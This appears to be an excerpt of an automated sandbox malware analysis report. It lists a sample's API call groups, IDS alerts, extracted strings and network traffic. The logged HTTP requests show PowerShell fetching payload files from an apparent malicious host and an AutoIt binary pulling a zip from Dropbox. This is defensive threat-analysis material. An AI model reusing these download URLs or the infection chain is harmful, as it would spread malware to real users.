Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A4DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00A4DB69
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 5_2_00A59F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00A59F9F

Source: global traffic

TCP traffic: 192.168.2.4:54343 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 162.125.66.18 162.125.66.18
Source: Joe Sandbox View	IP Address: 13.107.253.72 13.107.253.72

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:54345 -> 13.107.253.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:54346 -> 13.107.253.72:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:54347 -> 13.107.253.72:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49721 -> 66.248.206.135:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49718 -> 66.248.206.135:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49721 -> 66.248.206.135:443

Source: global traffic	HTTP traffic detected: GET /MixDep2025.xlsx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sharefilesonline.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /erw.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sharefilesonline.net

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A5D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,

5_2_00A5D7A1

Source: global traffic	HTTP traffic detected: GET /MixDep2025.xlsx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sharefilesonline.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /erw.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: sharefilesonline.net
Source: global traffic	HTTP traffic detected: GET /scl/fi/lklrqxdmbo9fj28d5n6yj/py.zip?rlkey=vaygxdji4h1bnl956pnwiq4y3&st=f8rif1rr&dl=1 HTTP/1.1User-Agent: AutoItHost: www.dropbox.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global traffic	HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global traffic	HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft

Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: Content-Security-Policyframe-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: blob: ; img-src https://* data: blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; frame-ancestors 'self' https://*.dropbox.com ; media-src https://* blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: sharefilesonline.net
Source: global traffic	DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic	DNS traffic detected: DNS query: otelrules.svc.static.microsoft

Source: a.exe, 00000005.00000003.1322936054.00000000015BF000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000003.1312251139.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com
Source: a.exe, 00000005.00000003.1312251139.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000003.1312199510.00000000015AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgESTR9
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000003.00000002.2449322674.000001E405C90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000003.00000003.1203404374.000001E4059F8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1203404374.000001E4059F8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1203404374.000001E4059F8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1203404374.000001E405A2D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1376459093.000001B718158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1376459093.000001B718016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000002.00000002.1360772734.000001B7081D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1360772734.000001B707FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000002.00000002.1360772734.000001B70969E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sharefilesonline.net
Source: powershell.exe, 00000002.00000002.1360772734.000001B7081D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: a.exe, 00000005.00000000.1236895850.0000000000AB5000.00000002.00000001.01000000.00000008.sdmp, a.exe.2.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: a.exe, 00000005.00000003.1312251139.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000003.1312199510.00000000015AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.myexternalip.com/raww
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://a.sprig.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/gsi/client
Source: powershell.exe, 00000002.00000002.1360772734.000001B707FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: a.exe, 00000005.00000003.1322936054.00000000015BF000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000003.1312251139.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgH
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.login.yahoo.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://app.hellofax.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://app.hellosign.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://canny.io/sdk.js
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/js/comments2/index-vflQdvUHu.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/js/file_viewer/index.web-vflMfKScd.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/fingerprintjs_component-vflTizAkf.c
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/app_actions/index-vflkGPgxR.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/index.web-vflSNNWF8.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/tokens-vflYBwytc.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-illustrations/index.web-vflaayXqX.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/dig/fonts-vflMHuSEC.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error-vflUzpyte.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/foundation-vflH6wwwv.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/google_one_tap-vflp9XDLJ.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/maestro_appshell_styles-vflfNNLV5.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/notify-vflPup1uz.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/snackbar-vfl0sHK6v.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/spectrum/index.web-vflwvsegv.css
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/images/favicon.ico
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/js/alameda_bundle/alameda_bundle_ie_en-vflXIb
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/typescript/component_libraries/dig-experimental/src/index.web-v
Source: py.zip.5.dr	String found in binary or memory: https://cfl.dropboxstatic.com/static/typescript/component_libraries/dwg-components/src/index.web-vfl
Source: powershell.exe, 00000002.00000002.1376459093.000001B718016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1376459093.000001B718016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1376459093.000001B718016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dl-web.dropbox.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/fsip/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/fsip/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docsend.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://experience.dropbox.com/
Source: svchost.exe, 00000003.00000003.1203404374.000001E405AA2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1203404374.000001E405AA2000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000002.00000002.1360772734.000001B7081D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1360772734.000001B708BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.dropbox.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.yahoo.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navi.dropbox.jp/
Source: powershell.exe, 00000002.00000002.1376459093.000001B718158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1376459093.000001B718016000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://officeapps-df.live.com
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://officeapps.live.com
Source: svchost.exe, 00000003.00000003.1203404374.000001E405AA2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/picker
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pal-test.adyen.com
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://photos.dropbox.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sales.dropboxbusiness.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
Source: powershell.exe, 00000002.00000002.1360772734.000001B7096CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1360772734.000001B7095D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sharefilesonline.net
Source: powershell.exe, 00000002.00000002.1360772734.000001B7095D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sharefilesonline.net/MixDep2025.xlsx
Source: powershell.exe, 00000002.00000002.1360772734.000001B7095D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sharefilesonline.net/MixDep2025.xlsxX
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1360772734.000001B7081D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1360772734.000001B7095D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sharefilesonline.net/erw.zip
Source: powershell.exe, 00000002.00000002.1360772734.000001B7095D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sharefilesonline.net/erw.zipX
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://showcase.dropbox.com/
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.docsend.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000003.1322529968.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000003.1323145583.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000002.1331335466.00000000016DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/pithos/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/playlist/
Source: a.exe, 00000005.00000002.1329754874.000000000165A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/lklrqxdmC
Source: a.exe, 00000005.00000002.1331664635.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000005.00000003.1323613012.0000000001564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/scl/fi/lklrqxdmbo9fj28d5n6yj/py.zip?rlkey=vaygxdji4h1bnl956pnwiq4y3&st=f8rif
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/service_worker.js
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/api/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: py.zip.5.dr	String found in binary or memory: https://www.dropboxstatic.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.dropboxstatic.com/static/
Source: powershell.exe, 00000002.00000002.1360772734.000001B709A8E000.00000004.00000800.00020000.00000000.sdmp, a.exe.2.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hellofax.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.hellosign.com/
Source: a.exe, 00000005.00000003.1311910682.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.paypal.com/sdk/js

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 54345 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54345
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54347
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 54347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 66.248.206.135:443 -> 192.168.2.4:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.4:54345 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 5_2_00A5F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

5_2_00A5F45C

